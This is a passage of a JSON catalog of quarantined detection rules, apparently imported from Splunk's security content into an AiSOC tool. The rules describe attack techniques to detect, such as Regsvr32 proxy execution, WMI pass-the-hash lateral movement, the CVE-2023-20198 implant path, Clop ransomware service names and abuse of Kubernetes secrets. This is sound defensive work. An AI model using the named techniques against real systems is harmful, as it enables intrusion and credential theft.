leverages Azure AD audit logs, focusing on user consent actions and system-driven blocks. Monitoring these blocked consent attempts is crucial as it highlights potential threats early on, indicating that a user might be targeted or that malicious applications are attempting to infiltrate the organization. If confirmed malicious, this activity suggests that Azure's security measures successfully prevented a harmful application from accessing organizational data, warranting immediate investigation to understand the context and take preventive measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-consent-blocked-for-risky-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06b8ec9a-d3b5-4882-8f16-04b4d10f5eab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_consent_blocked_for_risky_application.yml" } }, { "id": "splunk-security-content-07052556-d4b5-4bae-89aa-cbdc1bb11250", "type": "detection", "name": "Linux Auditd Disable Or Modify System Firewall", "description": "The following analytic detects the suspicious disable or modify system firewall. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-disable-or-modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07052556-d4b5-4bae-89aa-cbdc1bb11250", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_disable_or_modify_system_firewall.yml" } }, { "id": "splunk-security-content-070e9b80-6252-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect Regsvr32 Application Control Bypass", "description": "The following analytic identifies the abuse of Regsvr32.exe to proxy execution of malicious code, specifically detecting the loading of \"scrobj.dll\" by Regsvr32.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line executions. This activity is significant because Regsvr32.exe is a trusted, signed Microsoft binary, often used in \"Squiblydoo\" attacks to bypass application control mechanisms. If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvr32-application-control-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "070e9b80-6252-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvr32_application_control_bypass.yml" } }, { "id": "splunk-security-content-0734bd21-2769-4972-a5f1-78bb1e011224", "type": "detection", "name": "PowerShell Invoke WmiExec Usage", "description": "The following analytic detects the execution of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). This detection leverages PowerShell script block logs to identify instances where the Invoke-WMIExec command is used. Monitoring this activity is crucial as it indicates potential lateral movement using WMI commands with NTLMv2 pass-the-hash authentication. If confirmed malicious, this activity could allow an attacker to execute commands remotely on target systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-invoke-wmiexec-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0734bd21-2769-4972-a5f1-78bb1e011224", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_invoke_wmiexec_usage.yml" } }, { "id": "splunk-security-content-073e69d0-68b2-4142-aa90-a7ee6f590676", "type": "detection", "name": "Windows Modify Registry wuStatusServer", "description": "The following analytic identifies suspicious modifications to the Windows Update configuration registry, specifically targeting the WUStatusServer key. It leverages data from the Endpoint datamodel to detect changes in the registry path associated with Windows Update settings. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection and deploy additional payloads. If confirmed malicious, this modification could allow attackers to evade defenses, potentially leading to further system compromise and persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-wustatusserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "073e69d0-68b2-4142-aa90-a7ee6f590676", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_wustatusserver.yml" } }, { "id": "splunk-security-content-07921114-6db4-4e2e-ae58-3ea8a52ae93f", "type": "detection", "name": "Detect Regasm with Network Connection", "description": "The following analytic detects the execution of regasm.exe establishing a network connection to a public IP address, excluding private IP ranges. This detection leverages Sysmon EventID 3 logs to identify such behavior. This activity is significant as regasm.exe is a legitimate Microsoft-signed binary that can be exploited to bypass application control mechanisms. If confirmed malicious, this behavior could indicate an adversary's attempt to establish a remote Command and Control (C2) channel, potentially leading to privilege escalation and further malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07921114-6db4-4e2e-ae58-3ea8a52ae93f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_with_network_connection.yml" } }, { "id": "splunk-security-content-07c0d28a-9a9b-409f-8d4b-65355bd19ead", "type": "detection", "name": "ESXi Lockdown Mode Disabled", "description": "This detection identifies when Lockdown Mode is disabled on an ESXi host, which can indicate that a threat actor is attempting to weaken host security controls. Disabling Lockdown Mode allows broader remote access via SSH or the host client and may precede further malicious actions such as data exfiltration, lateral movement, or VM tampering.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-lockdown-mode-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07c0d28a-9a9b-409f-8d4b-65355bd19ead", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_lockdown_mode_disabled.yml" } }, { "id": "splunk-security-content-07c36cda-6567-43c3-bc1a-89dff61e2cd9", "type": "detection", "name": "Cisco IOS XE Implant Access", "description": "The following analytic identifies the potential exploitation of the Cisco IOS XE vulnerability, CVE-2023-20198, in the Web User Interface.\nIt monitors POST requests to the \"/webui/logoutconfirm.html?logon_hash=*\" endpoint using the Web datamodel.\nThis activity can be significant as it indicates potential access request to the implant\nIf confirmed malicious, attackers could maintain privileged access, compromising the device's integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-ios-xe-implant-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07c36cda-6567-43c3-bc1a-89dff61e2cd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/cisco_ios_xe_implant_access.yml" } }, { "id": "splunk-security-content-07e08a12-870c-11eb-b5f9-acde48001122", "type": "detection", "name": "Clop Ransomware Known Service Name", "description": "The following analytic identifies the creation of a service with a known name used by CLOP ransomware for persistence and high-privilege code execution. It detects this activity by monitoring Windows Event Logs (EventCode 7045) for specific service names (\"SecurityCenterIBM\", \"WinCheckDRVs\"). This activity is significant because the creation of such services is a common tactic used by ransomware to maintain control over infected systems. If confirmed malicious, this could allow attackers to execute code with elevated privileges, maintain persistence, and potentially disrupt or encrypt critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clop-ransomware-known-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07e08a12-870c-11eb-b5f9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clop_ransomware_known_service_name.yml" } }, { "id": "splunk-security-content-07eed200-03f5-11ec-98fb-acde48001122", "type": "detection", "name": "Gsuite Suspicious Shared File Name", "description": "The following analytic detects shared files in Google Drive with suspicious filenames commonly used in spear phishing campaigns. It leverages GSuite Drive logs to identify documents with titles that include keywords like \"dhl,\" \"ups,\" \"invoice,\" and \"shipment.\" This activity is significant because such filenames are often used to lure users into opening malicious documents or clicking harmful links. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further compromise of the user's system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-suspicious-shared-file-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07eed200-03f5-11ec-98fb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_suspicious_shared_file_name.yml" } }, { "id": "splunk-security-content-08058866-7987-486f-b042-275715ef6e9d", "type": "detection", "name": "Windows Impair Defense Override SmartScreen Prompt", "description": "The following analytic detects modifications to the Windows registry that override the Windows Defender SmartScreen prompt. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"PreventSmartScreenPromptOverride\" registry setting. This activity is significant because it indicates an attempt to disable the prevention of user overrides for SmartScreen prompts, potentially allowing users to bypass security warnings. If confirmed malicious, this could lead to users inadvertently executing or accessing harmful content, increasing the risk of security incidents or system compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-override-smartscreen-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08058866-7987-486f-b042-275715ef6e9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml" } }, { "id": "splunk-security-content-081c485d-ac8d-4bee-ad4c-525772fead4d", "type": "detection", "name": "Windows Office Product Spawned Control", "description": "The following analytic identifies instances where `control.exe` is spawned by a Microsoft Office product. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant because it can indicate exploitation attempts related to CVE-2021-40444, where `control.exe` is used to execute malicious .cpl or .inf files. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "081c485d-ac8d-4bee-ad4c-525772fead4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_control.yml" } }, { "id": "splunk-security-content-083708d4-d763-4ba2-87ac-105b526de81a", "type": "detection", "name": "Windows Audit Policy Excluded Category via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" and \"/exclude\" command-line arguments which indicates that the user's per-user policy will cause audit to be suppressed regardless of the system audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to exclude specific users events from log data. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-excluded-category-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "083708d4-d763-4ba2-87ac-105b526de81a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_excluded_category_via_auditpol.yml" } }, { "id": "splunk-security-content-084275ba-61b8-11ec-8d64-acde48001122", "type": "detection", "name": "Linux Service Restarted", "description": "The following analytic detects the restarting or re-enabling of services on Linux systems using the `systemctl` or `service` commands. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. This activity is significant as adversaries may use it to maintain persistence or execute unauthorized actions. If confirmed malicious, this behavior could lead to repeated execution of malicious payloads, unauthorized access, or data destruction. Security analysts should investigate these events to mitigate risks and prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-restarted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "084275ba-61b8-11ec-8d64-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_restarted.yml" } }, { "id": "splunk-security-content-086ab581-8877-42b3-9aee-4a7ecb0923af", "type": "detection", "name": "Detect Password Spray Attempts", "description": "This analytic employs the 3-sigma approach to detect an unusual volume of failed authentication attempts from a single source. A password spray attack is a type of brute force attack where an attacker tries a few common passwords across many different accounts to avoid detection and account lockouts. By utilizing the Authentication Data Model, this detection is effective for all CIM-mapped authentication events, providing comprehensive coverage and enhancing security against these attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "086ab581-8877-42b3-9aee-4a7ecb0923af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_password_spray_attempts.yml" } }, { "id": "splunk-security-content-089c862f-5f83-49b5-b1c8-7e4ff66560c7", "type": "detection", "name": "Domain Group Discovery with Adsisearcher", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for domain groups. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks containing `[adsisearcher]` and group-related queries. This activity is significant as it may indicate an attempt by adversaries or Red Teams to enumerate domain groups for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-adsisearcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "089c862f-5f83-49b5-b1c8-7e4ff66560c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_adsisearcher.yml" } }, { "id": "splunk-security-content-08c41040-624c-11ec-a71f-acde48001122", "type": "detection", "name": "Linux Visudo Utility Execution", "description": "The following analytic detects the execution of the 'visudo' utility to modify the /etc/sudoers file on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because unauthorized changes to the /etc/sudoers file can grant elevated privileges to users, potentially allowing adversaries to execute commands as root. If confirmed malicious, this could lead to full system compromise, privilege escalation, and persistent unauthorized access, severely impacting the security posture of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-visudo-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08c41040-624c-11ec-a71f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_visudo_utility_execution.yml" } }, { "id": "splunk-security-content-08cb291e-ea77-48e8-a95a-0799319bf056", "type": "detection", "name": "Windows AD DSRM Account Changes", "description": "The following analytic identifies changes to the Directory Services Restore Mode (DSRM) account behavior via registry modifications. It detects alterations in the registry path \"*\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DSRMAdminLogonBehavior\" with specific values indicating potential misuse. This activity is significant because the DSRM account, if misconfigured, can be exploited to persist within a domain, similar to a local administrator account. If confirmed malicious, an attacker could gain persistent administrative access to a Domain Controller, leading to potential domain-wide compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dsrm-account-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08cb291e-ea77-48e8-a95a-0799319bf056", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dsrm_account_changes.yml" } }, { "id": "splunk-security-content-08d67349-0808-4f55-b431-1037269fa517", "type": "detection", "name": "Windows PowerShell Process Implementing Manual Base64 Decoder", "description": "The following analytic identifies Windows PowerShell processes that implement a manual Base64 decoder.\nThreat actors often use Base64 encoding to obfuscate malicious payloads or commands within PowerShell scripts.\nBy manually decoding Base64 strings, attackers can evade detection mechanisms that look for standard decoding functions like using the \"-enc\" flag or the \"FromBase64String\" function.\nThis detection focuses on PowerShell processes that exhibit characteristics of manual Base64 decoding, such as the presence of specific string manipulation methods and bitwise operations.\nSecurity teams should investigate any instances of such activity, especially if found in conjunction with other suspicious behaviors or on systems that should not be using PowerShell for such tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.010", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-process-implementing-manual-base64-decoder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08d67349-0808-4f55-b431-1037269fa517", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_process_implementing_manual_base64_decoder.yml" } }, { "id": "splunk-security-content-091712ff-b02a-4d43-82ed-34765515d95d", "type": "detection", "name": "GetNetTcpconnection with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-NetTcpconnection` PowerShell cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet lists network connections on a system, which adversaries may use for situational awareness and Active Directory discovery. Monitoring this activity is crucial as it can indicate reconnaissance efforts by an attacker. If confirmed malicious, this behavior could allow an attacker to map the network, identify critical systems, and plan further attacks, potentially leading to data exfiltration or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getnettcpconnection-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "091712ff-b02a-4d43-82ed-34765515d95d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getnettcpconnection_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-09555511-aca6-484a-b6ab-72cd03d73c34", "type": "detection", "name": "Windows Local Administrator Credential Stuffing", "description": "The following analytic detects attempts to authenticate using the built-in local Administrator account across more than 30 endpoints within a 5-minute window. It leverages Windows Event Logs, specifically events 4625 and 4624, to identify this behavior. This activity is significant as it may indicate an adversary attempting to validate stolen local credentials across multiple hosts, potentially leading to privilege escalation. If confirmed malicious, this could allow the attacker to gain widespread access and control over numerous systems within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-local-administrator-credential-stuffing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09555511-aca6-484a-b6ab-72cd03d73c34", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_local_administrator_credential_stuffing.yml" } }, { "id": "splunk-security-content-096ab390-05ca-462c-884e-343acd5b9240", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Agent", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests based on user agents. This activity is significant for a SOC because Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, potentially resulting in significant security breaches and exfiltration of critical information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "096ab390-05ca-462c-884e-343acd5b9240", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_agent.yml" } }, { "id": "splunk-security-content-09725404-a44f-4ed3-9efa-8ed5d69e4c53", "type": "detection", "name": "GetDomainGroup with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainGroup` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet, part of the PowerView tool, is used to enumerate domain groups within a Windows domain. The detection leverages script block text to identify this specific command. Monitoring this activity is crucial as it may indicate an adversary or Red Team performing reconnaissance to gain situational awareness and map out Active Directory structures. If confirmed malicious, this activity could lead to further exploitation, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaingroup-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09725404-a44f-4ed3-9efa-8ed5d69e4c53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaingroup_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-097b28b5-7004-4d40-a715-7e390501788b", "type": "detection", "name": "Linux Ruby Privilege Escalation", "description": "The following analytic detects the execution of Ruby commands with elevated privileges on a Linux system. It identifies processes where Ruby is used with the `-e` flag to execute commands via `sudo`, leveraging Endpoint Detection and Response (EDR) telemetry. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as root. If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access, execute arbitrary commands, and maintain persistent control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ruby-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "097b28b5-7004-4d40-a715-7e390501788b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ruby_privilege_escalation.yml" } }, { "id": "splunk-security-content-0995fca1-f346-432f-b0bf-a66d14e6b428", "type": "detection", "name": "Windows Increase in User Modification Activity", "description": "This analytic detects an increase in modifications to AD user objects. A large volume of changes to user objects can indicate potential security risks, such as unauthorized access attempts, impairing defences or establishing persistence. By monitoring AD logs for unusual modification patterns, this detection helps identify suspicious behavior that could compromise the integrity and security of the AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 